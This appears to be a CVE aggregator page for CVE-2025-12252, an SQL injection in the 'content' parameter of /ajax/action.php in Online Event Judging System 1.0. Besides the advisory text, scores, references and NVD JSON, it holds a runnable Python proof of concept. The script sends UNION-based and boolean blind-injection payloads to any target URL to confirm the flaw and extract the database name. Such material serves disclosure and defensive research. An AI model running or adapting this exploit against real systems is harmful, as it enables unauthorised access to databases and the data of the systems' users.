CVE-2025-12252

Description

A vulnerability was found in code-projects Online Event Judging System 1.0. Affected is an unknown function of the file /ajax/action.php. The manipulation of the argument content results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Online Event Judging System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12252 SQL Injection PoC
# Target: Online Event Judging System 1.0
# File: /ajax/action.php
# Parameter: content

def exploit_sqli(target_url, payload):
    """
    SQL Injection exploitation function
    Extract database name as demonstration
    """
    # Prepare the malicious request
    endpoint = f"{target_url}/ajax/action.php"
    
    # SQL injection payload for database enumeration
    # Using UNION-based injection technique
    data = {
        'content': f"' UNION SELECT NULL,database(),NULL,NULL-- -",
        'action': 'judge_event'  # Example action parameter
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def blind_sqli_check(target_url):
    """
    Boolean-based blind SQL injection check
    Verify vulnerability existence
    """
    endpoint = f"{target_url}/ajax/action.php"
    
    # True condition - should return expected result
    true_payload = "' AND 1=1-- -"
    # False condition - should return different result
    false_payload = "' AND 1=2-- -"
    
    data_true = {'content': true_payload, 'action': 'judge_event'}
    data_false = {'content': false_payload, 'action': 'judge_event'}
    
    try:
        resp_true = requests.post(endpoint, data=data_true, timeout=10)
        resp_false = requests.post(endpoint, data=data_false, timeout=10)
        
        if resp_true.text != resp_false.text:
            print("[+] Blind SQL Injection confirmed!")
            return True
        else:
            print("[-] No SQL injection detected")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12252.py <target_url>")
        print("Example: python cve-2025-12252.py http://192.168.1.100/event-judging")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f"[*] Testing CVE-2025-12252 on {target}")
    print("[*] Checking for SQL Injection vulnerability...")
    
    blind_sqli_check(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12252
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12252
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12252/
[4] VulDB https://vuldb.com/cve/CVE-2025-12252
[5] https://code-projects.org/
[6] https://github.com/xmqaq/cve/issues/10
[7] https://vuldb.com/?ctiid.329923
[8] https://vuldb.com/?id.329923
[9] https://vuldb.com/?submit.673953

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12252", "sourceIdentifier": "[email protected]", "published": "2025-10-27T09:15:36.603", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Online Event Judging System 1.0. Affected is an unknown function of the file /ajax/action.php. The manipulation of the argument content results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9FE35151-38A0-407C-A81B-14BA65BD9F8F"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xmqaq/cve/issues/10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329923", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329923", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673953", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}